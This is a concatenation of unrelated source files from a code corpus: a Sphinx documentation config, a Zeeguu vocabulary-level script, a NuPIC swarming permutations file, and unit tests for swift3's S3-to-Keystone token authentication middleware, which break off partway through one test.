# There are two options for replacing |today|: either, you set today to some
# non-false value, then it is used:
#today = ''
# Else, today_fmt is used as the format for a strftime call.
#today_fmt = '%B %d, %Y'
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
exclude_patterns = ['_build']
# The reST default role (used for this markup: `text`) to use for all
# documents.
#default_role = None
# If true, '()' will be appended to :func: etc. cross-reference text.
#add_function_parentheses = True
# If true, the current module name will be prepended to all description
# unit titles (such as .. function::).
#add_module_names = True
# If true, sectionauthor and moduleauthor directives will be shown in the
# output. They are ignored by default.
#show_authors = False
# The name of the Pygments (syntax highlighting) style to use.
pygments_style = 'sphinx'
# A list of ignored prefixes for module index sorting.
#modindex_common_prefix = []
# If true, keep warnings as "system message" paragraphs in the built documents.
#keep_warnings = False
# -- Options for HTML output ----------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
html_theme = 'alabaster'
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
html_theme_options = {
'logo': 'logo-white.png',
'github_button': True,
'github_banner': True,
'github_user': 'pluralsight',
'github_repo': 'guides-cms',
}
html_sidebars = {
'**': [
'about.html',
'navigation.html',
'relations.html',
'searchbox.html',
]
}
# Add any paths that contain custom themes here, relative to this directory.
#html_theme_path = []
# The name for this set of Sphinx documents. If None, it defaults to
# "<project> v<release> documentation".
#html_title = None
# A shorter title for the navigation bar. Default is the same as html_title.
#html_short_title = None
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
#html_logo = None
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico) being 16x16 or 32x32
# pixels large.
#html_favicon = None
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
html_static_path = ['_static']
# Add any extra paths that contain custom files (such as robots.txt or
# .htaccess) here, relative to this directory. These files are copied
# directly to the root of the documentation.
#html_extra_path = []
# If not '', a 'Last updated on:' timestamp is inserted at every page bottom,
# using the given strftime format.
#html_last_updated_fmt = '%b %d, %Y'
# If true, SmartyPants will be used to convert quotes and dashes to
# typographically correct entities.
#html_use_smartypants = True
# Custom sidebar templates, maps document names to template names.
#html_sidebars = {}
# Additional templates that should be rendered to pages, maps page names to
# template names.
#html_additional_pages = {}
# If false, no module index is generated.
#html_domain_indices = True
# If false, no index is generated.
#html_use_index = True
# If true, the index is split into individual pages for each letter.
#html_split_index = False
# If true, links to the reST sources are added to the pages.
#html_show_sourcelink = True
# If true, "Created using Sphinx" is shown in the HTML footer. Default is True.
#html_show_sphinx = True
# If true, "(C) Copyright ..." is shown in the HTML footer. Default is True.
#html_show_copyright = True
# If true, an OpenSearch description file will be output, and all pages will
# contain a <link> tag referring to it. The value of this option must be the
# base URL from which the finished HTML is served.
#html_use_opensearch = ''
# This is the file name suffix for HTML files (e.g. ".xhtml").
#html_file_suffix = None
# Output file base name for HTML help builder.
htmlhelp_basename = 'HackerGuidesCMSdoc'
# -- Options for LaTeX output ---------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#'preamble': '',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
('index', 'HackerGuidesCMS.tex', u'Hacker Guides CMS Documentation',
u'Pluralsight LLC', 'manual'),
]
# The name of an image file (relative to this directory) to place at the top of
# the title page.
#latex_logo = None
# For "manual" documents, if this is true, then toplevel headings are parts,
# not chapters.
#latex_use_parts = False
# If true, show page references after internal links.
#latex_show_pagerefs = False
# If true, show URL addresses after external links.
#latex_show_urls = False
# Documents to append as an appendix to all manuals.
#latex_appendices = []
# If false, no module index is generated.
#latex_domain_indices = True
# -- Options for manual page output ---------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
('index', 'hackerguidescms', u'Hacker Guides CMS Documentation',
[u'Pluralsight LLC'], 1)
]
# If true, show URL addresses after external links.
#man_show_urls = False
# -- Options for Texinfo output -------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
('index', 'HackerGuidesCMS', u'Hacker Guides CMS Documentation',
u'Pluralsight LLC', 'HackerGuidesCMS', 'One line description of project.',
'Miscellaneous'),
]
# Documents to append as an appendix to all manuals.
#texinfo_appendices = []
# If false, no module index is generated.
#texinfo_domain_indices = True
# How to display URL addresses: 'footnote', 'no', or 'inline'.
#texinfo_show_urls = 'footnote'
# If true, do not generate a @detailmenu in the "Top" node's menu.
#texinfo_no_detailmenu = False
| agpl-3.0 | -5,459,976,400,695,646,000 | 30.028674 | 79 | 0.701398 | false |
mircealungu/Zeeguu-Core | tools/learner_level.py | 1 | 1584 | #!/usr/bin/env python
"""
Script that estimates a learner's monthly vocabulary level from their bookmarks.
To be called from a cron job.
"""
from sortedcontainers import SortedList
from zeeguu_core.model import User, Bookmark
from wordstats import Word
user = User.find_by_id(1890)
language = 'nl'
months_dict = dict()
for bookmark in Bookmark.query.filter_by(user=user):
if not bookmark.origin.language.code == language:
continue
# if not bookmark.quality_bookmark():
# continue
if len(bookmark.origin.word) < 4:
continue
date_key = bookmark.time.strftime("%y-%m")
if date_key not in months_dict:
months_dict[date_key] = SortedList(key=lambda x: x.rank)
word_stats = Word.stats(bookmark.origin.word, language)
if word_stats.rank == 100000:
print("ignoring: " + bookmark.origin.word)
print(word_stats.rank)
continue
# our user has a lot of het's
# might make sense to keep a word only once
if word_stats not in months_dict[date_key]:
months_dict[date_key].add(word_stats)
for key in months_dict:
len_for_month = len(months_dict[key])
print(f"{key} -> {len_for_month}")
lower_bounds = int(len_for_month / 4)
upper_bounds = int(len_for_month / 4 * 3)
WORDS_TO_CONSIDER = upper_bounds - lower_bounds
if WORDS_TO_CONSIDER == 0:
continue
ranks = ""
sum = 0
for each in months_dict[key][lower_bounds:upper_bounds]:
ranks += f" {each.klevel} {each.word}"
sum += each.klevel
print(f"avg: {sum/WORDS_TO_CONSIDER}")
print(ranks)
print("")
| mit | -389,770,890,047,582,600 | 21.956522 | 64 | 0.63447 | false |
jefffohl/nupic | tests/swarming/nupic/swarming/experiments/smart_speculation_temporal/permutations.py | 38 | 5492 | # ----------------------------------------------------------------------
# Numenta Platform for Intelligent Computing (NuPIC)
# Copyright (C) 2013, Numenta, Inc. Unless you have an agreement
# with Numenta, Inc., for a separate license for this software code, the
# following terms and conditions apply:
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero Public License version 3 as
# published by the Free Software Foundation.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
# See the GNU Affero Public License for more details.
#
# You should have received a copy of the GNU Affero Public License
# along with this program. If not, see http://www.gnu.org/licenses.
#
# http://numenta.org/licenses/
# ----------------------------------------------------------------------
"""
Template file used by ExpGenerator to generate the actual
permutations.py file by replacing $XXXXXXXX tokens with desired values.
This permutations.py file was generated by:
'/Users/ronmarianetti/nupic/eng/lib/python2.6/site-packages/nupic/frameworks/opf/expGenerator/ExpGenerator.py'
"""
import os
from nupic.swarming.permutationhelpers import *
# The name of the field being predicted. Any allowed permutation MUST contain
# the prediction field.
# (generated from PREDICTION_FIELD)
predictedField = 'attendance'
permutations = {
'modelParams': {
'sensorParams': {
'encoders': {
'A': PermuteEncoder(fieldName='daynight', encoderClass='SDRCategoryEncoder', w=7, n=100),
'C': PermuteEncoder(fieldName='precip', encoderClass='SDRCategoryEncoder', w=7, n=100),
'B': PermuteEncoder(fieldName='daynight', encoderClass='SDRCategoryEncoder', w=7, n=100),
'E': PermuteEncoder(fieldName='home_winloss', encoderClass='AdaptiveScalarEncoder', maxval=0.7, n=PermuteInt(13, 500, 25), clipInput=True, w=7, minval=0),
'D': PermuteEncoder(fieldName='visitor_winloss', encoderClass='AdaptiveScalarEncoder', maxval=0.786, n=PermuteInt(13, 500, 25), clipInput=True, w=7, minval=0),
'G': PermuteEncoder(fieldName='timestamp', encoderClass='DateEncoder.timeOfDay', radius=PermuteChoices([1, 8]), w=7),
'F': PermuteEncoder(fieldName='timestamp', encoderClass='DateEncoder.dayOfWeek', radius=PermuteChoices([1, 3]), w=7),
'Pred': PermuteEncoder(fieldName='attendance', encoderClass='AdaptiveScalarEncoder', maxval=36067, n=PermuteInt(13, 500, 25), clipInput=True, w=7, minval=0),
},
},
'tpParams': {
'minThreshold': PermuteInt(9, 12),
'activationThreshold': PermuteInt(12, 16),
},
}
}
# Fields selected for final hypersearch report;
# NOTE: These values are used as regular expressions by RunPermutations.py's
# report generator
# (fieldname values generated from PERM_PREDICTED_FIELD_NAME)
report = [
'.*attendance.*',
]
# Permutation optimization setting: either minimize or maximize metric
# used by RunPermutations.
# NOTE: The value is used as a regular expressions by RunPermutations.py's
# report generator
# (generated from minimize = 'nonprediction:aae:window=1000:field=attendance')
minimize = 'prediction:aae:window=1000:field=attendance'
def dummyModelParams(perm):
""" This function can be used for Hypersearch algorithm development. When
present, we don't actually run the CLA model in the OPF, but instead run
a dummy model. This function returns the dummy model params that will be
used. See the OPFDummyModelRunner class source code (in
nupic.swarming.ModelRunner) for a description of the schema for
the dummy model params.
"""
errScore = 500
if not perm['modelParams']['sensorParams']['encoders']['A'] is None:
errScore -= 50
if not perm['modelParams']['sensorParams']['encoders']['B'] is None:
errScore -= 40
if not perm['modelParams']['sensorParams']['encoders']['C'] is None:
errScore -= 30
if not perm['modelParams']['sensorParams']['encoders']['D'] is None:
errScore -= 20
if not perm['modelParams']['sensorParams']['encoders']['E'] is None:
errScore -= 15
if not perm['modelParams']['sensorParams']['encoders']['F'] is None:
errScore -= 10
if not perm['modelParams']['sensorParams']['encoders']['G'] is None:
errScore -= 5
delay = 0
#If the model only has the A field have it run slowly to simulate speculation.
encoderCount = 0
for key in perm.keys():
if 'encoder' in key and not perm[key] is None:
encoderCount+=1
delay=encoderCount*encoderCount*.1
dummyModelParams = dict(
metricValue = errScore,
metricFunctions = None,
delay=delay,
)
return dummyModelParams
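# Worked illustration (hypothetical permutation, added for clarity): if only the
# 'A' and 'B' encoders are enabled and the remaining encoders are None, the
# score computed above is 500 - 50 - 40 = 410, so the dummy model reports
# metricValue=410 along with a delay derived from how many encoder keys are
# present in `perm`.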
def permutationFilter(perm):
""" This function can be used to selectively filter out specific permutation
combinations. It is called by RunPermutations for every possible permutation
  of the variables in the permutations dict. It should return True for a valid
  combination of permutation values and False for an invalid one.
Parameters:
---------------------------------------------------------
perm: dict of one possible combination of name:value
pairs chosen from permutations.
"""
# An example of how to use this
#if perm['__consumption_encoder']['maxval'] > 300:
# return False;
#
return True
| gpl-3.0 | 5,411,109,736,788,141,000 | 36.875862 | 167 | 0.68445 | false |
swiftstack/swift3-stackforge | swift3/test/unit/test_s3_token_middleware.py | 2 | 34117 | # Copyright 2012 OpenStack Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import copy
import base64
import json
import logging
import time
import unittest
import uuid
import fixtures
import mock
import requests
from requests_mock.contrib import fixture as rm_fixture
from six.moves import urllib
from swift3 import s3_token_middleware as s3_token
from swift.common.swob import Request, Response
from swift.common.wsgi import ConfigFileError
GOOD_RESPONSE_V2 = {'access': {
'user': {
'username': 'S3_USER',
'name': 'S3_USER',
'id': 'USER_ID',
'roles': [
{'name': 'swift-user'},
{'name': '_member_'},
],
},
'token': {
'id': 'TOKEN_ID',
'tenant': {
'id': 'TENANT_ID',
'name': 'TENANT_NAME'
}
}
}}
GOOD_RESPONSE_V3 = {'token': {
'user': {
'domain': {
'name': 'Default',
'id': 'default',
},
'name': 'S3_USER',
'id': 'USER_ID',
},
'project': {
'domain': {
'name': 'PROJECT_DOMAIN_NAME',
'id': 'PROJECT_DOMAIN_ID',
},
'name': 'PROJECT_NAME',
'id': 'PROJECT_ID',
},
'roles': [
{'name': 'swift-user'},
{'name': '_member_'},
],
}}
class TestResponse(requests.Response):
"""Utility class to wrap requests.Response.
Class used to wrap requests.Response and provide some convenience to
initialize with a dict.
"""
def __init__(self, data):
self._text = None
super(TestResponse, self).__init__()
if isinstance(data, dict):
self.status_code = data.get('status_code', 200)
headers = data.get('headers')
if headers:
self.headers.update(headers)
# Fake the text attribute to streamline Response creation
# _content is defined by requests.Response
self._content = data.get('text')
else:
self.status_code = data
def __eq__(self, other):
return self.__dict__ == other.__dict__
@property
def text(self):
return self.content
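# Example sketch (a hypothetical helper, not used by the tests below): how
# TestResponse can stand in for a real requests.Response.
def _example_test_response_usage():
    fake = TestResponse({'status_code': 403,
                         'text': json.dumps({'error': 'denied'})})
    assert fake.status_code == 403
    assert json.loads(fake.text)['error'] == 'denied'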
class FakeApp(object):
calls = 0
"""This represents a WSGI app protected by the auth_token middleware."""
def __call__(self, env, start_response):
self.calls += 1
resp = Response()
resp.environ = env
return resp(env, start_response)
class S3TokenMiddlewareTestBase(unittest.TestCase):
TEST_AUTH_URI = 'https://fakehost/identity'
TEST_URL = '%s/v2.0/s3tokens' % (TEST_AUTH_URI, )
TEST_DOMAIN_ID = '1'
TEST_DOMAIN_NAME = 'aDomain'
TEST_GROUP_ID = uuid.uuid4().hex
TEST_ROLE_ID = uuid.uuid4().hex
TEST_TENANT_ID = '1'
TEST_TENANT_NAME = 'aTenant'
TEST_TOKEN = 'aToken'
TEST_TRUST_ID = 'aTrust'
TEST_USER = 'test'
TEST_USER_ID = uuid.uuid4().hex
TEST_ROOT_URL = 'http://127.0.0.1:5000/'
def setUp(self):
super(S3TokenMiddlewareTestBase, self).setUp()
self.logger = fixtures.FakeLogger(level=logging.DEBUG)
self.logger.setUp()
self.time_patcher = mock.patch.object(time, 'time', lambda: 1234)
self.time_patcher.start()
self.app = FakeApp()
self.conf = {
'auth_uri': self.TEST_AUTH_URI,
}
self.middleware = s3_token.S3Token(self.app, self.conf)
self.requests_mock = rm_fixture.Fixture()
self.requests_mock.setUp()
def tearDown(self):
self.requests_mock.cleanUp()
self.time_patcher.stop()
self.logger.cleanUp()
super(S3TokenMiddlewareTestBase, self).tearDown()
def start_fake_response(self, status, headers):
self.response_status = int(status.split(' ', 1)[0])
self.response_headers = dict(headers)
class S3TokenMiddlewareTestGood(S3TokenMiddlewareTestBase):
def setUp(self):
super(S3TokenMiddlewareTestGood, self).setUp()
self.requests_mock.post(self.TEST_URL,
status_code=201,
json=GOOD_RESPONSE_V2)
# Ignore the request and pass to the next middleware in the
# pipeline if no path has been specified.
def test_no_path_request(self):
req = Request.blank('/')
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
# Ignore the request and pass to the next middleware in the
# pipeline if no Authorization header has been specified
def test_without_authorization(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
def test_nukes_auth_headers(self):
client_env = {
'HTTP_X_IDENTITY_STATUS': 'Confirmed',
'HTTP_X_ROLES': 'admin,_member_,swift-user',
'HTTP_X_TENANT_ID': 'cfa'
}
req = Request.blank('/v1/AUTH_cfa/c/o', environ=client_env)
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
for key in client_env:
self.assertNotIn(key, req.environ)
def test_without_auth_storage_token(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
req.headers['Authorization'] = 'AWS badboy'
self.middleware(req.environ, self.start_fake_response)
self.assertEqual(self.response_status, 200)
def _assert_authorized(self, req, expect_token=True,
account_path='/v1/AUTH_TENANT_ID/'):
self.assertTrue(req.path.startswith(account_path))
expected_headers = {
'X-Identity-Status': 'Confirmed',
'X-Roles': 'swift-user,_member_',
'X-User-Id': 'USER_ID',
'X-User-Name': 'S3_USER',
'X-Tenant-Id': 'TENANT_ID',
'X-Tenant-Name': 'TENANT_NAME',
'X-Project-Id': 'TENANT_ID',
'X-Project-Name': 'TENANT_NAME',
'X-Auth-Token': 'TOKEN_ID',
}
for header, value in expected_headers.items():
if header == 'X-Auth-Token' and not expect_token:
self.assertNotIn(header, req.headers)
continue
self.assertIn(header, req.headers)
self.assertEqual(value, req.headers[header])
# WSGI wants native strings for headers
self.assertIsInstance(req.headers[header], str)
self.assertEqual(1, self.middleware._app.calls)
self.assertEqual(1, self.requests_mock.call_count)
request_call = self.requests_mock.request_history[0]
self.assertEqual(json.loads(request_call.body), {'credentials': {
'access': 'access',
'signature': 'signature',
'token': base64.urlsafe_b64encode(b'token').decode('ascii')}})
def test_authorized(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_tolerate_missing_token_id(self):
resp = copy.deepcopy(GOOD_RESPONSE_V2)
del resp['access']['token']['id']
self.requests_mock.post(self.TEST_URL,
status_code=201,
json=resp)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req, expect_token=False)
def test_authorized_bytes(self):
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': b'access',
'signature': b'signature',
'string_to_sign': b'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_http(self):
protocol = 'http'
host = 'fakehost'
port = 35357
self.requests_mock.post(
'%s://%s:%s/v2.0/s3tokens' % (protocol, host, port),
status_code=201, json=GOOD_RESPONSE_V2)
self.middleware = (
s3_token.filter_factory({'auth_protocol': 'http',
'auth_host': host,
'auth_port': port})(self.app))
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_v3(self):
protocol = 'http'
host = 'fakehost'
port = 35357
self.requests_mock.post(
'%s://%s:%s/v3/s3tokens' % (protocol, host, port),
status_code=201, json=GOOD_RESPONSE_V2)
self.middleware = (
s3_token.filter_factory({'auth_protocol': 'http',
'auth_host': host,
'auth_port': port,
'auth_version': '3'})(self.app))
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorized_trailing_slash(self):
self.middleware = s3_token.filter_factory({
'auth_uri': self.TEST_AUTH_URI + '/'})(self.app)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
def test_authorization_nova_toconnect(self):
req = Request.blank('/v1/AUTH_swiftint/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access:FORCED_TENANT_ID',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req, account_path='/v1/AUTH_FORCED_TENANT_ID/')
@mock.patch.object(requests, 'post')
def test_insecure(self, MOCK_REQUEST):
self.middleware = s3_token.filter_factory(
{'insecure': 'True', 'auth_uri': 'http://example.com'})(self.app)
text_return_value = json.dumps(GOOD_RESPONSE_V2)
MOCK_REQUEST.return_value = TestResponse({
'status_code': 201,
'text': text_return_value})
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self.assertTrue(MOCK_REQUEST.called)
mock_args, mock_kwargs = MOCK_REQUEST.call_args
self.assertIs(mock_kwargs['verify'], False)
def test_insecure_option(self):
# insecure is passed as a string.
# Some non-secure values.
true_values = ['true', 'True', '1', 'yes']
for val in true_values:
config = {'insecure': val,
'certfile': 'false_ind',
'auth_uri': 'http://example.com'}
middleware = s3_token.filter_factory(config)(self.app)
self.assertIs(False, middleware._verify)
# Some "secure" values, including unexpected value.
false_values = ['false', 'False', '0', 'no', 'someweirdvalue']
for val in false_values:
config = {'insecure': val,
'certfile': 'false_ind',
'auth_uri': 'http://example.com'}
middleware = s3_token.filter_factory(config)(self.app)
self.assertEqual('false_ind', middleware._verify)
# Default is secure.
config = {'certfile': 'false_ind',
'auth_uri': 'http://example.com'}
middleware = s3_token.filter_factory(config)(self.app)
self.assertIs('false_ind', middleware._verify)
def test_auth_version(self):
for conf, expected in [
# if provided just host/scheme, tack on the default
# version/endpoint like before
({'auth_uri': 'https://example.com'},
'https://example.com/v2.0/s3tokens'),
# if provided a version-specific URI, trust it
({'auth_uri': 'https://example.com:5000',
'auth_version': '2.0'},
'https://example.com:5000/v2.0/s3tokens'),
({'auth_uri': 'http://example.com', 'auth_version': '3'},
'http://example.com/v3/s3tokens'),
# even try to allow for future versions
({'auth_uri': 'http://example.com', 'auth_version': '4.25'},
'http://example.com/v4.25/s3tokens'),
# keystone running under mod_wsgi often has a path prefix
({'auth_uri': 'https://example.com/identity'},
'https://example.com/identity/v2.0/s3tokens'),
# doesn't really work to include version in auth_uri
({'auth_uri': 'https://example.com/v2.0'},
'https://example.com/v2.0/v2.0/s3tokens')]:
middleware = s3_token.filter_factory(conf)(self.app)
self.assertEqual(expected, middleware._request_uri)
def test_ipv6_auth_host_option(self):
config = {}
ipv6_addr = '::FFFF:129.144.52.38'
request_uri = 'https://[::FFFF:129.144.52.38]:35357/v2.0/s3tokens'
# Raw IPv6 address should work
config['auth_host'] = ipv6_addr
middleware = s3_token.filter_factory(config)(self.app)
self.assertEqual(request_uri, middleware._request_uri)
# ...as should workarounds already in use
config['auth_host'] = '[%s]' % ipv6_addr
middleware = s3_token.filter_factory(config)(self.app)
self.assertEqual(request_uri, middleware._request_uri)
# ... with no config, we should get config error
del config['auth_host']
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory(config)(self.app)
self.assertEqual('Either auth_uri or auth_host required',
cm.exception.message)
@mock.patch.object(requests, 'post')
def test_http_timeout(self, MOCK_REQUEST):
self.middleware = s3_token.filter_factory({
'http_timeout': '2',
'auth_uri': 'http://example.com',
})(FakeApp())
MOCK_REQUEST.return_value = TestResponse({
'status_code': 201,
'text': json.dumps(GOOD_RESPONSE_V2)})
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self.assertTrue(MOCK_REQUEST.called)
mock_args, mock_kwargs = MOCK_REQUEST.call_args
self.assertEqual(mock_kwargs['timeout'], 2)
def test_http_timeout_option(self):
good_values = ['1', '5.3', '10', '.001']
for val in good_values:
middleware = s3_token.filter_factory({
'http_timeout': val,
'auth_uri': 'http://example.com',
})(FakeApp())
self.assertEqual(float(val), middleware._timeout)
bad_values = ['1, 4', '-3', '100', 'foo', '0']
for val in bad_values:
with self.assertRaises(ValueError) as ctx:
s3_token.filter_factory({
'http_timeout': val,
'auth_uri': 'http://example.com',
})(FakeApp())
self.assertTrue(ctx.exception.args[0].startswith((
'invalid literal for float():',
'could not convert string to float:',
'http_timeout must be between 0 and 60 seconds',
)), 'Unexpected error message: %s' % ctx.exception)
# default is 10 seconds
middleware = s3_token.filter_factory({
'auth_uri': 'http://example.com'})(FakeApp())
self.assertEqual(10, middleware._timeout)
def test_bad_auth_uris(self):
for auth_uri in [
'/not/a/uri',
'http://',
'//example.com/path']:
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory({'auth_uri': auth_uri})(self.app)
self.assertEqual('Invalid auth_uri; must include scheme and host',
cm.exception.message)
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory({
'auth_uri': 'nonhttp://example.com'})(self.app)
self.assertEqual('Invalid auth_uri; scheme must be http or https',
cm.exception.message)
for auth_uri in [
'http://[email protected]/',
'http://example.com/?with=query',
'http://example.com/#with-fragment']:
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory({'auth_uri': auth_uri})(self.app)
self.assertEqual('Invalid auth_uri; must not include username, '
'query, or fragment', cm.exception.message)
def test_bad_auth_parts(self):
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory({
'auth_host': 'example.com', 'auth_protocol': ''})(self.app)
self.assertEqual('Invalid auth_uri; must include scheme and host',
cm.exception.message)
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory({
'auth_host': 'example.com', 'auth_protocol': 'ftp'})(self.app)
self.assertEqual('Invalid auth_uri; scheme must be http or https',
cm.exception.message)
for conf in [
{'auth_host': 'example.com/?with=query'},
{'auth_host': 'user:[email protected]'},
{'auth_host': 'example.com/#with-fragment'}]:
with self.assertRaises(ConfigFileError) as cm:
s3_token.filter_factory(conf)(self.app)
self.assertEqual('Invalid auth_uri; must not include username, '
'query, or fragment', cm.exception.message)
def test_unicode_path(self):
url = u'/v1/AUTH_cfa/c/euro\u20ac'.encode('utf8')
req = Request.blank(urllib.parse.quote(url))
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
req.get_response(self.middleware)
self._assert_authorized(req)
class S3TokenMiddlewareTestBad(S3TokenMiddlewareTestBase):
def test_unauthorized_token(self):
ret = {"error":
{"message": "EC2 access key not found.",
"code": 401,
"title": "Unauthorized"}}
self.requests_mock.post(self.TEST_URL, status_code=403, json=ret)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
s3_denied_req = self.middleware._deny_request('AccessDenied')
self.assertEqual(resp.body, s3_denied_req.body)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
s3_denied_req.status_int) # pylint: disable-msg=E1101
self.assertEqual(0, self.middleware._app.calls)
self.assertEqual(1, self.requests_mock.call_count)
request_call = self.requests_mock.request_history[0]
self.assertEqual(json.loads(request_call.body), {'credentials': {
'access': 'access',
'signature': 'signature',
'token': base64.urlsafe_b64encode(b'token').decode('ascii')}})
def test_no_s3_creds_defers_to_auth_middleware(self):
# Without an Authorization header, we should just pass through to the
# auth system to make a decision.
req = Request.blank('/v1/AUTH_cfa/c/o')
resp = req.get_response(self.middleware)
self.assertEqual(resp.status_int, 200) # pylint: disable-msg=E1101
self.assertEqual(1, self.middleware._app.calls)
def test_fail_to_connect_to_keystone(self):
with mock.patch.object(self.middleware, '_json_request') as o:
s3_invalid_resp = self.middleware._deny_request('InvalidURI')
o.side_effect = s3_invalid_resp
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
self.assertEqual(resp.body, s3_invalid_resp.body)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
s3_invalid_resp.status_int) # pylint: disable-msg=E1101
self.assertEqual(0, self.middleware._app.calls)
def _test_bad_reply(self, response_body):
self.requests_mock.post(self.TEST_URL,
status_code=201,
text=response_body)
req = Request.blank('/v1/AUTH_cfa/c/o')
req.environ['swift3.auth_details'] = {
'access_key': u'access',
'signature': u'signature',
'string_to_sign': u'token',
}
resp = req.get_response(self.middleware)
s3_invalid_resp = self.middleware._deny_request('InvalidURI')
self.assertEqual(resp.body, s3_invalid_resp.body)
self.assertEqual(
resp.status_int, # pylint: disable-msg=E1101
s3_invalid_resp.status_int) # pylint: disable-msg=E1101
self.assertEqual(0, self.middleware._app.calls)
def test_bad_reply_not_json(self):
self._test_bad_reply('<badreply>')
def _test_bad_reply_missing_parts(self, *parts):
resp = copy.deepcopy(GOOD_RESPONSE_V2)
part_dict = resp
for part in parts[:-1]:
part_dict = part_dict[part]
del part_dict[parts[-1]]
self._test_bad_reply(json.dumps(resp))
def test_bad_reply_missing_token_dict(self):
self._test_bad_reply_missing_parts('access', 'token')
def test_bad_reply_missing_user_dict(self):
self._test_bad_reply_missing_parts('access', 'user')
def test_bad_reply_missing_user_roles(self):
self._test_bad_reply_missing_parts('access', 'user', 'roles')
def test_bad_reply_missing_user_name(self):
self._test_bad_reply_missing_parts('access', 'user', 'name')
def test_bad_reply_missing_user_id(self):
self._test_bad_reply_missing_parts('access', 'user', 'id')
def test_bad_reply_missing_tenant_dict(self):
self._test_bad_reply_missing_parts('access', 'token', 'tenant')
def test_bad_reply_missing_tenant_id(self):
self._test_bad_reply_missing_parts('access', 'token', 'tenant', 'id')
def test_bad_reply_missing_tenant_name(self):
self._test_bad_reply_missing_parts('access', 'token', 'tenant', 'name')
def test_bad_reply_valid_but_bad_json(self):
self._test_bad_reply('{}')
self._test_bad_reply('[]')
self._test_bad_reply('null')
self._test_bad_reply('"foo"')
self._test_bad_reply('1')
self._test_bad_reply('true')
class S3TokenMiddlewareTestDeferredAuth(S3TokenMiddlewareTestBase):
def setUp(self):
super(S3TokenMiddlewareTestDeferredAuth, self).setUp()
self.conf['delay_auth_decision'] = 'yes'
self.middleware = s3_token.S3Token(FakeApp(), self.conf)
def test_unauthorized_token(self):
ret = {"error":
{"message": "EC2 access key not found.",
"code": 401,
"title": "Unauthorized"}}
self.requests_mock.post(self.TEST_URL, status_code=403, json=ret)
